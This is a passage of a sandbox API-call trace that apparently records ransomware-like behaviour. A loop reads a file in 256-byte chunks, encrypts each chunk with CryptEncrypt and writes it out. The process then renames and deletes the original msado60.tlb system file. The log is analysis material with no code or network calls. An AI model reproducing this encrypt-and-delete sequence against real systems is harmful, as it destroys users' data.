lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.072] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.072] GetLastError () returned 0x0 [0168.072] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.072] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.072] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.072] GetLastError () returned 0x0 [0168.072] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.072] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.072] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.072] GetLastError () returned 0x0 [0168.072] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.072] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.072] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.072] GetLastError () returned 0x0 [0168.072] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.073] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.073] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.073] GetLastError () returned 0x0 [0168.073] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.073] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.073] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.073] GetLastError () returned 0x0 [0168.073] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.073] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.073] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.073] GetLastError () returned 0x0 [0168.073] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.073] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.073] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.073] GetLastError () returned 0x0 [0168.073] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.073] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.073] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.073] GetLastError () returned 0x0 [0168.073] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.074] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.074] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.074] GetLastError () returned 0x0 [0168.074] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.074] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.074] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.074] GetLastError () returned 0x0 [0168.074] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.074] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.074] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.074] GetLastError () returned 0x0 [0168.074] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.074] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.074] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.074] GetLastError () returned 0x0 [0168.074] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.074] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.074] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.074] GetLastError () returned 0x0 [0168.075] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.075] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.075] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.075] GetLastError () returned 0x0 [0168.075] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.075] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.075] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.075] GetLastError () returned 0x0 [0168.075] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.075] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.075] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.075] GetLastError () returned 0x0 [0168.075] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.075] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.075] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.075] GetLastError () returned 0x0 [0168.075] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.075] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.076] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.076] GetLastError () returned 0x0 [0168.076] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.076] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.076] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.076] GetLastError () returned 0x0 [0168.076] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.076] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.076] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.076] GetLastError () returned 0x0 [0168.076] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.076] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.076] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.076] GetLastError () returned 0x0 [0168.076] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.076] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.076] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.077] GetLastError () returned 0x0 [0168.077] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.077] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.077] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.077] GetLastError () returned 0x0 [0168.077] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.077] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.077] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.077] GetLastError () returned 0x0 [0168.077] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.077] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.077] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.077] GetLastError () returned 0x0 [0168.077] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.077] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.077] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.077] GetLastError () returned 0x0 [0168.077] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.077] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.078] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.078] GetLastError () returned 0x0 [0168.078] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.078] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.078] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.078] GetLastError () returned 0x0 [0168.078] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.078] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.078] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.078] GetLastError () returned 0x0 [0168.078] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.079] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado60.tlb") returned 1 [0168.079] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado60.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado60.tlb")) returned 0 [0168.080] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado60.tlb" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado60.tlb") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado60.tlb" [0168.080] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado60.tlb" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\ado") returned 1 [0168.080] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\.xX41D.tmp" (normalized: "c:\\program files\\common files\\system\\ado\\.xx41d.tmp")) returned 0x41d [0168.080] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado60.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado60.tlb"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\.xX41D.tmp" (normalized: "c:\\program files\\common files\\system\\ado\\.xx41d.tmp"), dwFlags=0x1) returned 0 [0168.081] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\.xX41D.tmp" (normalized: "c:\\program files\\common files\\system\\ado\\.xx41d.tmp")) returned 1 [0168.081] CryptDestroyKey (hKey=0x9ad178) returned 1 [0168.081] wcslen (_String="OK") returned 0x2 [0168.081] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0168.081] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 